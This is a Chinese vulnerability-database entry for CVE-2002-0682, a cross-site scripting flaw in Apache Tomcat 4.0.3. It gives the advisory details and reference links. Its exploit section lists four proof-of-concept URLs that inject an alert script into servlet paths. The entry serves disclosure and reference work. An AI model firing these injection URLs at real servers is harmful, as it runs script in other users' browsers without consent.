Apache Tomcat控制器绘图跨站脚本漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1106847 漏洞类型 跨站脚本
发布时间 2002-07-10 更新时间 2006-04-07
CVE编号 CVE-2002-0682 CNNVD-ID CNNVD-200207-072
漏洞平台 Linux CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/21604
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200207-072
|漏洞详情
ApacheTomcat4.0.3版本存在跨站脚本漏洞。远程攻击者可以像其他web用户借助带/servlet/绘图的URL脚本执行脚本,该漏洞在控制器抛出异常脚本时不过滤脚本。
|漏洞EXP
source: http://www.securityfocus.com/bid/5193/info

A vulnerability has been reported for Apache Tomcat 4.0.3 on Microsoft Windows and Linux platforms. Reportedly, it is possible for an attacker to launch a cross site scripting attack.

When servlet mapping is enabled, it is possible to invoke various servlets and classes and cause Apache Tomcat to throw an exception. This will make cross site scripting attacks possible. 

tomcat-server/servlet/org.apache.catalina.servlets.WebdavStatus/<SCRIPT>alert(document.domain)</SCRIPT>
tomcat-server/servlet/org.apache.catalina.ContainerServlet/<SCRIPT>alert(document.domain)</SCRIPT>
tomcat-server/servlet/org.apache.catalina.Context/<SCRIPT>alert(document.domain)</SCRIPT>
tomcat-server/servlet/org.apache.catalina.Globals/<SCRIPT>alert(document.domain)</SCRIPT>
|参考资料

来源:VULNWATCH
名称:20020710[VulnWatch]wp-02-0008:ApacheTomcatCrossSiteScripting
链接:http://archives.neohapsis.com/archives/vulnwatch/2002-q3/0014.html
来源:XF
名称:tomcat-servlet-xss(9520)
链接:http://xforce.iss.net/xforce/xfdb/9520
来源:BID
名称:5193
链接:http://www.securityfocus.com/bid/5193
来源:OSVDB
名称:4973
链接:http://www.osvdb.org/4973
来源:BUGTRAQ
名称:20020710wp-02-0008:ApacheTomcatCrossSiteScripting
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=102631703811297&w=2